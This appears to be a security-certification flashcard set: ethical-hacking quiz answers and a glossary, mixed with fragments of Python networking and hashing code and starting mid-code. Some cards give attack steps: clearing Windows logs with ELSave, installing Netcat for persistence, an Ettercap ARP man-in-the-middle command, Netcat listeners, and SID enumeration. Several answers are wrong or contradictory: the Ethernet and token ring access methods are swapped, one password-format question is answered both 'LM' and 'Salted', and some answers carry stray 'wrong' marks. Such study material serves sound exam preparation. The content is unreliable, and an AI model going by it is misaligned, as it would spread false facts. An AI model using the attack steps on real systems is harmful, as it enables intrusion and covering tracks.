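def subnets_of(block: str, mask: str) -> List[str]:
    """All subnets that `mask` carves a larger block into, e.g. the /27s of a /24."""
    new_prefix = ipaddress.IPv4Network("0.0.0.0/%s" % mask).prefixlen
    return [str(s) for s in ipaddress.IPv4Network(block).subnets(new_prefix=new_prefix)]


if __name__ == "__main__":
    MASK = "255.255.255.224"
    for host in ("192.168.1.24", "192.168.1.35"):
        print(host, describe(host, MASK))
    print("same subnet:", same_subnet("192.168.1.24", "192.168.1.35", MASK))
    print(subnets_of("192.168.1.0/24", MASK))
```

During network mapping this matters beyond the quiz: two hosts that look adjacent by address but sit in different /27s must traverse a router (and whatever ACLs it carries) to reach each other, and a "gateway" candidate that is actually a broadcast address is a sign the mask was misread.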
Confidentiality
Data or information is not made available or disclosed to unauthorized persons.
File
Data stored as a named unit on a data storage medium. Examples include a program, a document, and a database.
Test data
Data that is run through a computer program to test the software. Test data can be used to test compliance with controls in the software.
Operational control
Day-to-day controls that are used for normal daily operation of the organization. Operational controls ensure that normal operational objectives are achieved.
Which type of vulnerability assessment tool typically includes fuzzers that give arbitrary input to a system's interface?
Depth assessment tools
Client/server
Describes the relationship between two computer programs in which one program, the client, makes a service request from another program, the server, which fulfills the request. Clients rely on servers for resources, such as files, devices, and even processing power.
Blu-ray Disc
Designed as a replacement for DVDs. Blu-ray is a high-density optical disk that can hold audio, video, or data.
Destruction
Destroying data, information, or resources so that the legitimate user is deprived of them.
Critical path methodology (CPM)
Determines what activities are critical and what dependencies exist among the various tasks.
Secure Sockets Layer (SSL)
Developed by Netscape for transmitting private documents via the Internet. It uses public-key cryptography to authenticate the server and negotiate a symmetric session key, which then encrypts the data transferred over the connection. All SSL versions are now deprecated and have been superseded by Transport Layer Security (TLS), which follows the same design.
Which of the following is considered a nontechnical attack?
Dumpster diving
Recovery time objective (RTO)
During the execution of disaster recovery or business continuity plans, the time goal for the reestablishment and recovery of a business function or resource.
Which of the following tools can be used to clear the Windows logs?
ELSave
Enterprise resource planning (ERP)
ERP systems are software systems used for operational planning and administration, and for optimizing internal business processes. The best-known supplier of these systems is SAP.
Stream cipher
Encrypts data typically one byte at a time.
Availability
Ensures that the systems responsible for delivering, storing, and processing data are available and accessible as needed by individuals who are authorized to use the resources.
topology discovery
Entails determining the devices in the network, their connectivity relationships to one another, and the internal IP addressing scheme in use.
interface testing
Evaluates whether an application's systems or components correctly pass data and control to one another. It verifies whether module interactions are working properly and errors are handled correctly.
Hearsay
Evidence based on what a witness heard someone else say, not what the witness personally observed.
network discovery scan
Examines a range of IP addresses to determine which ports are open. This type of scan only shows a list of systems on the network and the ports in use on the network.
Exclusive-OR (XOR)
Exclusive disjunction (usual symbol XOR) is a logical operator that results in true if one, but not both, of the operands is true.
Patent
Exclusive rights granted by the federal government to an inventor to exclude others from making, using, or selling his or her invention.
Which of the following programs can be used for port redirection?
FPipe
An administrator needs vulnerability research to: (Check all that apply)
Find weaknesses and alert the network administrator before a network attack. (Divulging information about weaknesses in the network is not a reason.)
Evidence
Gathered by an auditor during the course of an audit. The information gathered stands as proof that can support conclusions of an audit report.
Gold standard
Generally regarded as practices and procedures that are the best of the best.
Separation of duties
Given the seven areas of information security responsibility, separation of duties defines the roles, tasks, responsibilities, and accountabilities for information security uniquely for the different duties of the IT staff and IT security staff.
KeyGhost is an example of what?
Hardware keylogger
Your Windows computer is running erratically and you suspect that spyware has been installed. You have noticed that each time you try to go to an antivirus website, your computer is redirected to another domain and you are flooded with pop-ups. What file did the spyware most likely modify?
HOSTS
While getting ready to pay some bills, you visit your bank's website and prepare to log in. However you notice that the login page now has several additional fields where your bank ATM and your Social Security number are requested. What category of banking Trojan could be responsible for this modification?
HTML injection
Hashing algorithm
Hashing is used to verify the integrity of data and messages. A well-designed hashing algorithm examines every bit of the data while condensing it, and even a slight change to the data results in a large change in the message hash. It is considered a one-way process.
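The "slight change, large change" property in that definition (the avalanche effect) can be measured directly. The following Python is an added example, not from the original card: it flips a single bit of a constructed message, counts how many of SHA-256's 256 output bits change, and shows the constant-time comparison to use when checking a recorded digest.

```python
"""Avalanche effect and integrity check with SHA-256 (added example)."""
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Hex digest of data."""
    return hashlib.sha256(data).hexdigest()


def flip_bit(data: bytes, bit_index: int) -> bytes:
    """Copy of data with one bit flipped (bit 0 is the LSB of byte 0)."""
    buf = bytearray(data)
    buf[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(buf)


def differing_bits(a: bytes, b: bytes) -> int:
    """Hamming distance between two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("lengths differ")
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def avalanche(data: bytes, bit_index: int = 0) -> dict:
    """How many digest bits change when one input bit changes.
    For a good hash this is close to half of them."""
    h1 = hashlib.sha256(data).digest()
    h2 = hashlib.sha256(flip_bit(data, bit_index)).digest()
    changed = differing_bits(h1, h2)
    return {"changed_bits": changed, "total_bits": len(h1) * 8,
            "fraction": changed / (len(h1) * 8)}


def verify(data: bytes, expected_hex: str) -> bool:
    """Recompute the digest and compare in constant time, so an attacker
    cannot learn the stored value from timing how far the comparison got."""
    return hmac.compare_digest(sha256_hex(data), expected_hex)


if __name__ == "__main__":
    msg = b"Transfer $100 to account 12345"  # constructed sample message
    print(sha256_hex(msg))
    print(avalanche(msg, bit_index=0))   # roughly 128 of 256 bits change
    print(verify(msg, sha256_hex(msg)), verify(msg + b"0", sha256_hex(msg)))
```

The flipped-bit test is a quick sanity check on any hash you are handed; an "integrity" checksum where one bit of input moves only a few bits of output (a CRC, for instance) offers no protection against a deliberate modification.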
Entity relationship diagram (ERD)
Helps map the requirements and define the relationship between elements.
Application layer
Highest layer of the seven-layer OSI model. The application layer is used as an interface to applications or communications protocols.
Which of the following is a tool commonly used for enumeration?
Hyena
After two days of work, you successfully exploited a traversal vulnerability and gained root access to a CentOS 6.5 server. Which of the following is the best option to maintain access?
Install Netcat
How would you use ARP cache poisoning to determine malicious activity on a network?
If you cannot SPAN a port, you can use ARP cache poisoning to redirect traffic destined for other hosts on the switch through your machine, so that traffic which would otherwise reach only its own switch port becomes visible to your sniffer.
A business has hired you as a penetration tester after a recent security breach. The attacker was successful at planting a Trojan on one internal server and extracting all of its financial data. Which of the following is an immediate recommendation that you can give the business?
Immediately move the financial data to another system
Field
In a database, the part of a record reserved for a particular type of data; for example, in a library catalog, author, title, ISBN, and subject headings would all be fields.
Buffer overflow
In computer programming, this occurs when a software application writes data beyond the allocated end of a buffer in memory. Buffer overflows are usually caused by missing bounds checks in the program, and they expose the application to malicious code injection or other attacks that hijack its control flow.
Concurrency control
In computer science, or more specifically, in the field of databases, a method used to ensure that database transactions are executed in a safe manner (that is, without data loss). Concurrency control is especially applicable to database-management systems, which must ensure that transactions are executed safely and that they follow the ACID rules.
Log
In computing, the log is equivalent to the history log of ships. The log is an automatic system that records significant events. The files that contain these records are called log files. Generally, the log is a file; what is written on it is a record.
Asymmetric encryption
In cryptography, an asymmetric key algorithm uses a pair of cryptographic keys to encrypt and decrypt. The two keys are related mathematically: A message encrypted by the algorithm using one key can be decrypted by the same algorithm using the other. In a sense, one key "locks" a lock (encryption), but a different key is required to unlock it (decryption).
Fail safe
In the logical sense, fail safe means the process of discovering a system error, terminating the process, and preventing the system from being compromised. The system enters a state in which no access is allowed. In physical systems, a fail safe refers to items such as controlled-access doors. When there is a power failure, the door "fails safe," which means that the door unlocks and people can leave the facility; they are not locked in.
IT asset
Information technology asset such as hardware, software, or data.
Public key infrastructure (PKI)
Infrastructure used to facilitate e-commerce and build trust. PKI consists of hardware, software, people, policies, and procedures; it is used to create, manage, store, distribute, and revoke public key certificates. PKI is based on public-key cryptography.
Synchronize sequence number
Initially passed to the other party at the start of the TCP three-way handshake, it is used to track the movement of data between parties. Every byte of data sent over a TCP connection has a sequence number.
Email/interpersonal messaging
Instant messages, usually text, sent from one person to another, or to a group of people, via computer.
Irregularities
Intentional violations of established management policy, or deliberate misstatements, or omissions of information concerning the area under audit or the organization as a whole.
Supply chain management (SCM)
Intercompany planning control and monitoring of central functions such as procurement, production, and sales to increase their efficiency.
Corrective controls
Internal controls designed to resolve problems soon after they arise.
account management
Involves the addition and deletion of accounts that are granted access to systems or networks. It also involves changing the permissions or privileges granted to those accounts.
Which of the following types of biometric systems is considered the most accurate?
Iris scanning
What is one of the disadvantages of using John the Ripper?
It cannot differentiate between uppercase and lowercase passwords.
SNMP is a protocol used to query hosts and other network devices about their network status. One of its key features is its use of network agents to collect and store management information, such as the number of error packets received by a managed device. Which of the following makes it a great target for hackers?
It sends community strings in clear text.
What is a sniffer listening on port 88 attempting to detect?
Kerberos logins
Which of the following types of rootkits would be found at ring 0?
Kernel
Which one of the following statements about the Windows protection ring model is FALSE?
Kernel mode restricts access to all resources.
Which format stores Windows passwords in a 14-character field?
LAN Manager
When discussing Windows authentication, which of the following is considered the weakest?
LM
Which of the following is considered the weakest?
LM
Which type of Windows authentication uses encrypted passwords that are padded to 14 characters?
LM
Which of the following is not a DoS program?
LOIC
Criminal law
Laws pertaining to crimes against the state or conduct detrimental to society. These violations of criminal statutes are punishable by law and can include monetary penalties and jail time.
Trademark
Legal protection for a logo, name, or characteristic that can be identified as exclusive.
What is heap spraying?
Loading a large amount of data and some shellcode into a dynamically allocated space
Which one of the following statements best describes DLL injection?
Loading a malicious external library
Cold site
Location that contains no computing-related equipment except for environmental support such as air conditioners and power outlets, and a security system made ready for installing computer equipment.
Device lock
Lock used to secure laptops and other devices from theft.
Which form of sniffing is characterized by a large number of packets with bogus MAC addresses?
MAC flooding
Accreditation
Management's formal acceptance of a system or application.
Edit controls
Manual or automated process to check for and allow the correction of data errors before processing. Edit controls detect errors in the input portion of information.
Which of the following steps are involved in creating a baseline? ( Check all that apply. )
Map the network infrastructure; identify the controls already in place; create an inventory of all assets, and prioritize/rank the critical assets.
Which of the following are phases involved in vulnerability management? (Check all that apply.)
Monitoring; vulnerability assessment; creating a baseline.
passive vulnerability scanner (PVS)
Monitors network traffic at the packet layer to determine topology, services, and vulnerabilities.
Guidelines
Much like standards, these are recommendations; they are not hard-and-fast rules.
You have gained access to a system. You would now like to hide a file that will be hidden and streamed behind another. Which of the following file systems is required?
NTFS (the hidden file is stored in an alternate data stream attached to the visible file)
Which of the following tools can be used for vulnerability scanning? (Check all that apply.)
Nessus; GFI LanGuard; OpenVAS
Which of the following best describes Netcat?
Netcat is called the TCP/IP Swiss army knife. It works with Windows and Linux and can read and write data across network connections using TCP or UDP.
Wide area network (WAN)
Network that spans the distance between buildings, cities, and even countries. WANs are LANs connected using wide area network services from telecommunications carriers; they typically use technologies such as standard phone lines (called plain old telephone service, POTS, or the public switched telephone network, PSTN), Integrated Services Digital Network (ISDN), Frame Relay, Asynchronous Transfer Mode (ATM), or other high-speed services.
Before leaving work last night, you configured the following capture filter: not broadcast and not multicast. Today you stop the capture and are preparing to review the traffic. Before doing so, your manager says he believes you were hit with a DoS attack that utilized broadcast traffic. What is the best course of action?
None of the above, because the traffic you need to examine is not available.
If you were going to enumerate DNS, which of the following tools could you use?
Nslookup
Which one of the following terms describes logging in to a system with no user ID or password?
Null session
Denial of service (DoS)
Occurs when an attacker consumes the resources of your computer or network for things they were not intended to do, thus preventing legitimate users from making normal use of them.
Fragmentation
Occurs when IP datagrams must be split into smaller packets because they exceed the maximum transmission unit (MTU) of a link along the path.
Gray box testing
Occurs when the tester has only partial knowledge of the target or its network; it is often performed to see what an internal user with limited access could reach.
Black box testing
Occurs when the tester has no knowledge of the target or its network structure.
Attenuation
Occurs with any signal and can be described as a weakening of the signal that increases as the signal travels farther from the source.
Finger
On some UNIX systems, finger identifies who is logged on and active and sometimes provides personal information about that individual.
Frequency-hopping spread spectrum (FHSS)
One of the basic modulation techniques used in spread-spectrum signal transmission. FHSS is another technique used to make wireless communication harder to intercept and more resistant to interference.
Central processing unit (CPU)
One of the central components of a system, the CPU carries out the vast majority of the calculations performed by a computer. It can be thought of as the "brain" of a computer. The CPU is like a manager or boss, telling what the other components of the system should be doing at a given moment.
Internet Protocol (IP)
One of the key protocols of TCP/IP. The IP protocol is found at Layer 3 (network layer) of the OSI model.
Transmission Control Protocol (TCP)
One of the main protocols of the TCP/IP suite. It provides reliable, ordered, and guaranteed delivery of data over IP.
Signature scanning
One of the most basic ways of scanning for computer viruses, it works by comparing suspect files and programs to signatures of known viruses stored in a database.
Logic bomb
One of the most dangerous types of malware in that it waits for a predetermined event or an amount of time to execute its payload. Typically used by disgruntled employees for an insider attack.
Written authorization
One of the most important parts of the ethical hack. It gives you permission to perform the tests agreed to by the client.
Integrity
One of the three items considered part of the security triad; the others are confidentiality and availability. It is used to verify the accuracy and completeness of an item.
Trapdoor function
One-way function that is easy to compute in one direction but infeasible to invert without a secret (the "trapdoor"); this is the property on which asymmetric algorithms are built.
What does the command nc -n -v -l -p 25 accomplish?
Opens a Netcat listener on the local computer on port 25: -l listens for an inbound connection, -p 25 sets the port, -v gives verbose output, and -n skips DNS lookups.
Switch
Operates at Layer 2 of the OSI model. A device that links several separate LANs and provides packet filtering among them. A LAN switch is a device with multiple ports, each of which can support an entire Ethernet or token ring LAN.
Which of the following are denial of service attacks typically not used for?
Pump and dump
Internet control message protocol (ICMP)
Part of TCP/IP that supports diagnostics and error control. Ping is a type of ICMP message.
Which of the following is a vulnerability assessment methodology where the targeted host is not actively attacked?
Passive assessment
Which one of the following is a technical attack?
Password guessing
Which one of the following is least vulnerable to buffer-overflow attacks?
Perl
Cipher text
Plain text or clear text is what you have before encryption and cipher text is the encrypted result that is scrambled into an illegible form.
Security controls
Policies, standards, procedures, and guideline definitions for various security control areas or topics.
Mobile site
Portable data-processing facility transported by trailers to be quickly moved to a business location. Typically used by insurance companies and the military, these facilities provide a ready-conditioned information processing facility that can contain servers, desktop computers, communications equipment, and even microwave and satellite data links.
Port
Ports are used by protocols and applications. Port numbers are divided into three ranges including: Well-Known Ports, Registered Ports, and Dynamic and/or Private Ports. Well-Known Ports are those from 0 through 1023. Registered Ports are those from 1024 through 49151, and Dynamic and/or Private Ports are those from 49152 through 65535.
Polyinstantiation
Prevents inference violations by allowing different versions of information items to exist at different classification levels. For example, an unclassified Navy officer might want information about a ship and might discover that it has left port and is bound for Europe. A Navy officer with classified access then might access the same database and discover that the ship has left port, but is really bound for Iraq.
network vulnerability scan
Probes a targeted system or network to identify vulnerabilities. It is a more complex scan of the network than a network discovery scan.
Work breakdown structure (WBS)
Process oriented; shows what activities need to be completed in a hierarchical manner.
Fourth-generation language (4GL)
Programming languages that are easier to use than lower-level languages such as BASIC, Assembly, or FORTRAN. 4GL languages such as SQL and Python are also known as nonprocedural, natural, or very high-level languages.
Address resolution protocol (ARP)
Protocol used to map a known IP address to an unknown physical address.
Certificate practice statement (CPS)
Provides a detailed explanation of how the certificate authority manages the certificates it issues and associated services such as key management. The CPS acts as a contract between the CA and users, describing the obligations and legal limitations, and setting the foundation for future audits.
Proxy server
Proxy servers stand in place of and are a type of firewall. They are used to improve performance and for added security. A proxy server intercepts all requests to the real server to see whether it can fulfill the requests itself. If not, it forwards the request to the real server.
After finding port 161 open on a targeted system, you have decided to attempt to guess what passwords/community strings to use. Which of the following should you try first?
Public/private
Which of the following is a vulnerability assessment tool? (Check all that apply.)
Qualys, Nessus Professional, GFI LanGuard, OpenVAS, Retina CS
Which type of password cracking makes use of the space/time memory trade-off?
Rainbow table
Which of the following uses the faster time-memory trade-off technique and works by precomputing all possible passwords in advance?
Rainbow tables
Which of the following describes a type of malware that restricts access to the computer system's files and folders until a monetary payment is made?
Ransomware
What is the best alternative if you discover that a rootkit has been installed on one of your computers?
Rebuild from known good media
Frame Relay
A type of packet-switching technology that transmits data faster than the X.25 standard. Frame Relay does not perform error correction at each computer in the network. Instead, it simply discards any messages with errors. It is up to the application software at the source and destination to perform error correction and to control for loss of messages.
What is a "pass the hash" attack?
Replaying the hash of a user's password
Which of the following corresponds to user mode and is the level of least privilege?
Ring 3
Data custodian
Role delegated by the data owner that has the responsibility of maintaining and protecting the organization's data.
Veriato Investigator is an example of what?
SOFTWARE KEYLOGGER
Microsoft uses various techniques to protect user account information. The second layer of security on the SAM file is known as what?
SYSKEY
The second layer of security on the SAM file is known as what?
SYSKEY
Which format stores Windows passwords in a 14-character field?
Salted
File type
Search for non-HTML file formats including PDF, DOC, PPT, and others.
Firewall
Security system in hardware or software form used to manage and control both network connectivity and network services. Firewalls act as chokepoints for traffic entering and leaving the network and prevent unrestricted access. Firewalls can be stateful or stateless.
Which of the following best describes a covert communication?
Sending and receiving unauthorized information or data by using a protocol, service, or server to transmit info in a way in which it was not intended to be used
What is the purpose of the command nc -l -v -n -p 80?
Set up a covert channel listening on port 80
Vulnerability scanners classify vulnerabilities by: (Check all that apply.)
Severity level wrong
Risk transference
Shifting the responsibility or burden to another party or individual.
Distributed denial of service (DDoS)
Similar to DoS, except the attack is launched from multiple, distributed agent IP devices.
Middleware
Software that "glues together" two or more types of software (for example, two applications, their operating systems, and the network on which everything works) by translating information between them and exchanging this information over a network without both interacting applications being aware of the middleware.
crypter
Software used to encrypt malware. Some crypters obscure the contents of the Trojan by applying an encryption algorithm. Crypters can use anything from AES, RSA, to even Blowfish, or they might use more basic obfuscation techniques, such as XOR, Base64 encoding, or even ROT13.
Which one of the following phrases best describes biometric authentication?
Something you are
Which of the following protocols uses UDP port 514?
Syslog
Which stage has the primary goal of authenticating to a remote host at the highest possible level?
System hacking
Telecommunications
Systems that transport information over a distance, sending and receiving audio, video, and data signals through electronic means.
Security testing
Techniques used to confirm the design and/or operational effectiveness of security controls implemented within a system. Examples include attack and penetration studies to determine whether adequate controls have been implemented to prevent breach-of-system controls and processes, and password strength testing by using tools such as password crackers.
Closed-circuit television (CCTV)
Television cameras used for video surveillance, in which all components are directly linked via cables or other direct means. A system comprising video transmitters that can feed one or more receivers the captured video. Typically used in banks, casinos, shopping centers, airports, or anywhere that physical security can be enhanced by monitoring events. Placement in these facilities is typically at locations where people enter or leave the facility, or at locations where critical transactions occur.
What does the following command in Ettercap do? ettercap -T -q -F cd.ef -M ARP /192.168.13.100
Tells Ettercap to do a text mode man-in-the-middle attack
Limit check
Test of specified amount fields against stipulated high or low limits of acceptability. When both high and low values are used, the test can be called a range check.
ACID test
Test that addresses atomicity, consistency, isolation, and durability. Programmers involved in database management use the ACID test to determine whether a database management system has been properly designed to handle transactions.
Recovery testing
Testing aimed at verifying the system's capability to recover from varying degrees of failure.
Gray box testing
Testing that occurs with only partial knowledge of the network or is performed to see what internal users have access to.
Crossover error rate (CER)
The CER is a comparison measurement for different biometric devices and technologies to measure their accuracy. The CER is the point at which FAR and FRR are equal or cross over. The lower the CER, the more accurate the biometric system.
Which of the following is NOT a characteristic of the National Vulnerability Database (NVD)?
The NVD actively performs vulnerability testing.
Service Set ID (SSID)
The SSID is a sequence of up to 32 letters or numbers that is the ID, or name, of a wireless local area network and is used to differentiate networks.
Target of engagement (TOE)
The TOE is the assessment or pen test target.
Trusted computer system evaluation criteria (TCSEC)
The United States Department of Defense Trusted Computer System Evaluation Criteria, also called the Orange Book. TCSEC is a system designed to evaluate standalone systems that places systems into one of four levels: A, B, C, or D. Its basis of measurement is confidentiality.
Inference
The ability to deduce information about data or activities to which the subject does not have access.
Vulnerability
The absence or weakness of a safeguard in an asset
Vulnerability
The absence or weakness of a safeguard in an asset.
Carrier sense multiple access with collision avoidance (CSMA/CA)
The access method used by local area networking technologies such as ethernet.
Carrier sense multiple access with collision detection (CSMA/CD)
The access method used by local area networking technologies such as token ring.
dynamic analysis
The act of analyzing software or programs while they are executing. Dynamic analysis also relates to the monitoring and analysis of computer activity and network traffic during malware analysis.
Decentralized computing
The act of distributing computing activities and computer processing to different locations.
Shoulder surfing
The act of looking over someone's shoulder to steal their password
War chalking
The act of marking on the wall or sidewalk near a building to indicate it has wireless access.
Spoofing
The act of masking your identity and pretending to be someone else or another device
Spoofing
The act of masking your identity and pretending to be someone else or another device. Common spoofing methods include ARP, DNS, and IP. It is also implemented by email in what are described as phishing schemes.
Phishing
The act of misleading or conning an individual into releasing and providing personal and confidential information to an attacker masquerading as a legitimate individual or business.
Nonattribution
The act of not providing a reference to a source of information.
Evasion
The act of performing activities to avoid detection.
Access point spoofing
The act of pretending to be a legitimate access point with the purpose of tricking individuals to pass traffic by the fake connection so that it can be captured and analyzed.
IT asset valuation
The act of putting a monetary value to an IT asset.
Bluejacking
The act of sending unsolicited messages, pictures, or information to a Bluetooth user.
A RID of 500 is associated with what account?
The administrator account
When reviewing a Windows domain, you are able to extract some account information. A RID of 500 is associated with what account?
The administrator account
Throughput
The amount of data transferred from one place to another or processed in a specified amount of time. Data transfer rates for disk drives and networks are measured in terms of throughput. Typically, throughputs are measured in kilobits per second, megabits per second, and gigabits per second.
Disaster tolerance
The amount of time that an organization can accept the unavailability of IT facilities and services.
static analysis
The analysis of software that is performed without actually executing programs. Static analysis is different from dynamic analysis, which is analysis performed on programs while they are "running" or executing. Static analysis makes use of disassemblers and decompilers to format the data into a human-readable format. It is also a technique used in malware analysis.
Gap analysis
The analysis of the differences between two different states, often for the purpose of determining how to get from point A to point B. Thus the aim is to look at ways to bridge the gap.
Information-processing facility (IPF)
The areas where information is processed, usually the computer room and support areas.
Insecure computing habits
The bad habits that employees, contractors, and third-party users have accumulated over the years can be attributed to the organization's lack of security awareness training, lack of security controls, and lack of any security policies or acceptable use policies (AUPs).
Moore's law
The belief that processing power of computers will double about every 18 months due to the rise in the number of transistors doubling per square inch.
Voice over IP (VoIP)
The capability to convert voice or fax calls into data packets for transmission over the Internet or other IP-based networks.
Certificate Revocation List (CRL)
The certification authority's listing of invalid certificates, such as compromised, revoked, or superseded certificates. The CRL is used during the digital signature verification process to check the validity of the certificate from which the public verification key is extracted.
Security by obscurity
The controversial use of secrecy to ensure security.
Latency
The delay that it takes one packet to travel from one node to another.
Due diligence
The execution of due care over time. When you see the term due diligence, think of the first letter of each word and remember "do detect" because due diligence is about finding the threats an organization faces. This is accomplished by using standards, best practices, and checklists.
Risk
The exposure or potential for loss or damage to IT assets within that IT infrastructure
Coupling
The extent of the complexity of interconnections with other modules.
Cohesion
The extent to which a system or subsystem performs a single function.
Echo request
The first part of an ICMP ping message, officially a Type 8.
Media access control (MAC)
The hard-coded address of the physical layer device that is attached to the network. All network interface controllers must have a hard-coded and unique MAC address. The MAC address is 48 bits long.
Librarian
The individual in the corporation responsible for storing, safeguarding, and maintaining data, programs, and computer information.
Network administrator
The individual responsible for the installation, management, and control of a network. When problems with the network arise, this is the person to call.
Copyright
The legal protection given to authors or creators that protects their expressions on a specific subject against unauthorized copying. It is applied to books, paintings, movies, literary works, and any other medium of use.
Probability
The likelihood of an event happening.
Script kiddie
The lowest form of cracker that looks for easy targets or well-worn vulnerabilities.
Zone transfer
The mechanism used by DNS servers to update each other by transferring resource records. It should be a controlled process between two DNS servers, but it is something that hackers will attempt to perform to steal the organization's DNS information. It can be used to map the network devices.
Corporate governance
The method by which a corporation is directed, administered, or controlled. It includes the laws and customs affecting that direction, as well as the goals for which it is governed. How objectives of an organization are set, the means of attaining such objectives, how performance-monitoring guidelines are determined, and ways to emphasize the importance of using resources efficiently are significant issues within the makeup of such a method.
Asynchronous transmission
The method whereby data is sent and received 1 byte at a time.
Demilitarized zone (DMZ)
The middle ground between a trusted internal network and an untrusted, external network. Services that internal and external users must use, such as HTTP, are typically placed there.
Baseband
The name given to a transmission method in which the entire bandwidth (the rate at which information travels through a network connection) is used to transmit just one signal.
Risk management
The overall responsibility and management of risk within an organization. Risk management is the responsibility and dissemination of roles, responsibilities, and accountabilities for risk in an organization.
Enterprise vulnerability management
The overall responsibility and management of vulnerabilities within an organization and how that management of vulnerabilities will be achieved through dissemination of duties throughout the IT organization.
Vulnerability management
The overall responsibility and management of vulnerabilities within an organization and how that management of vulnerabilities will be achieved through dissemination of duties throughout the IT organization.
Hardware
The physical equipment of a computer system, including the central processing unit, data storage devices, terminals, and printers.
Governance
The planning, influencing, and conducting of the policy and affairs of an organization.
Clipping level
The point at which an alarm threshold or trigger occurs.
Recovery point objective (RPO)
The point in time to which data must be restored to resume processing transactions. RPO is the basis on which a data protection strategy is developed.
Operating system (OS) identification
The practice of identifying the operating system of a networked device through either passive or active techniques.
Dumpster diving
The practice of rummaging through the trash of a potential target or victim to gain useful information.
Dumpster diving
The practice of rummaging through the trash of a potential target or victim to gain useful information.
Social engineering
The practice of tricking employees into revealing sensitive data about their computer system or infrastructure. This type of attack targets people and is the art of human manipulation. Even when systems are physically well protected, social engineering attacks are possible.
Social engineering
The practice of tricking employees into revealing sensitive data about their computer system or infrastructure; targets people and is the art of human manipulation
social engineering
The practice of tricking people into revealing sensitive data about their computer system or infrastructure. This type of attack targets people and is the art of human manipulation. Even when systems are physically well protected, social engineering attacks are possible.
Verification
The process of confirming that data is correct and accurate before it is processed or entered.
Decryption
The process of converting encrypted content into its original form, often the process of converting cipher text to plain text. Decryption is the opposite of encryption.
Site survey
The process of determining the optimum placement of wireless access points. The objective of the site survey is to create an accurate wireless system design/layout and budgetary quote.
War driving
The process of driving around a neighborhood or area to identify wireless access points.
Dynamic host configuration protocol (DHCP)
The process of dynamically assigning an IP address to a host device.
Authorization
The process of granting or denying access to a network resource based on the user's credentials.
denial of service (DoS)
The process of having network resources, services, and bandwidth reduced or eliminated because of unwanted or malicious traffic. The goal of a DoS attack is to render the network or system nonfunctional. Some examples include Ping of Death, SYN flood, IP spoofing, and Smurf attacks.
Log on
The process of identifying yourself to your computer or an online service; the initial identification procedure to gain access to a system as a legitimate user. The usual requirements are a valid username (or user ID) and password.
Defense in depth
The process of multilayered security. The layers may be administrative, technical, or logical.
Flooding
The process of overloading the network with traffic so that no legitimate traffic or activity can occur.
Contingency planning
The process of preparing to deal with calamities and noncalamitous situations before they occur so that the effects are minimized.
Prototyping
The process of quickly putting together a working model (a prototype) to test various aspects of the design, illustrate ideas or features, and gather early user feedback. Prototyping is often treated as an integral part of the development process, where it is believed to reduce project risk and cost.
port redirection
The process of redirecting one protocol from an existing port to another.
Privacy impact analysis
The process of reviewing the information held by the corporation and assessing the damage that would result if sensitive or personal information were lost, stolen, or divulged.
Tumbling
The process of rolling through various electronic serial numbers on a cell phone to attempt to find a valid set to use.
Multicast
The process of sending a computer packet to a group of recipients.
Ping sweep
The process of sending ping requests to a series of devices or to the entire range of networked devices.
Reverse engineering
The process of taking a software program apart and analyzing its workings in detail, usually to construct a new device or program that does the same thing without actually copying anything from the original.
War dialing
The process of using a software program to automatically call thousands of telephone numbers to look for any that have a modem attached.
operating system fingerprinting
The process of using some method to determine the operating system running on a host or a server.
Denial of Service (DoS)
The process of having network resources, services, and bandwidth reduced or eliminated because of unwanted or malicious traffic. This attack's goal is to render the network or system nonfunctional.
Criticality
The quality, state, degree, or measurement of the highest importance.
Bandwidth
The range of frequencies, expressed in hertz (Hz), that can pass over a given transmission channel. The bandwidth determines the rate at which information can be transmitted through the circuit.
Which of the following are characteristics of the Vulnerability Assessment Report?
The report categorizes vulnerabilities based on their severity levels. The report provides details of all the possible vulnerabilities with regard to the company's security policies. wrong
Security breach or security incident
The result of a threat or vulnerability being exploited by an attacker.
Access creep
The result of employees moving from one position to another within an organization without losing the privileges of the old position but while gaining the additional access of the new position. Thus, over time, employees build up much more access than they should have.
Data security
The science and study of methods of protecting data in computer and communications systems against unauthorized disclosure, transfer, modification, or destruction, whether accidental or intentional.
Encryption
The science of turning plain text into cipher text.
Echo reply
The second part of an ICMP ping message, officially a Type 0.
Statistical sampling
The selection of sample units from a population, and the measurement and/or recording of information on these units, to obtain estimates of population characteristics.
System software
The software that controls the operations of a computer system. It is a group of programs instead of one program. The operating system controls the hardware in the computer and peripherals, manages memory and files and multitasking functions, and is the interface between applications programs and the computer.
Minimum acceptable level of risk
The stake that an organization defines for the seven areas of information security responsibility. Depending on the goals and objectives for maintaining confidentiality, integrity, and availability of the IT infrastructure and its assets, the minimum level of acceptable risk will dictate the amount of information security.
Due care
The standard of conduct taken by a reasonable and prudent person. When you see the term due care, think of the first letter of each word and remember "do correct" because due care is about the actions that you take to reduce risk and keep it at that level.
Structured query language (SQL)
The standardized relational database language for querying, manipulating, and updating information in a relational database.
Continuity
The state or quality of being continuous or unbroken, without interruption and with a succession of parts intimately united.
Independence
The state or quality of being free from subjection or the influence, control, or guidance of individuals, things, or situations. Auditors and examining officials and their respective organizations must maintain neutrality and exercise objectivity so that opinions, judgments, conclusions, and recommendations on examined allegations are impartial and are viewed as impartial by disinterested third parties.
Risk
The subjective measure of the potential for harm that can result from the action of a person or thing.
Inherent risk
The susceptibility of an audit area to error, which could be material, individual, or in combination with other errors, assuming that there are no related internal controls.
Target of engagement (TOE)
The assessment or pen test target.
Certification
The technical review of the system or application.
Encapsulation
The technique of layering protocols in which one layer adds a header to the information from the layer above.
white-box testing
The testing team goes into the testing process with a deep understanding of the application or system. Using this knowledge, the team builds test cases to exercise each path, input field, and processing routine. This term is used to refer to network security tests as well as application tests.
gray-box testing
The testing team is provided more information than in black-box testing, while not as much as in white-box testing. Gray-box testing has the advantage of being nonintrusive while maintaining the boundary between developer and tester. This term is used to refer to network security tests as well as application tests.
black-box testing
The testing team is provided with no knowledge regarding the organization's network or application. The team can use any means at its disposal to obtain information about the organization's network or application. This is also referred to as zero-knowledge testing and closed testing. This term is used to refer to network security tests as well as application tests.
Bluesnarfing
The theft of information from a wireless device through a Bluetooth connection.
Accountability
The traceability of actions performed on a system to a specific system entity or user.
Data communications
The transmission or sharing of data between computers via an electronic medium.
What do the following commands demonstrate?
C:\>user2sid \\truck guest
S-1-5-21-343818398-789336058-1343024091-501
C:\>sid2user 5 21 343818398 789336058 1343024091 500
Name is Joe
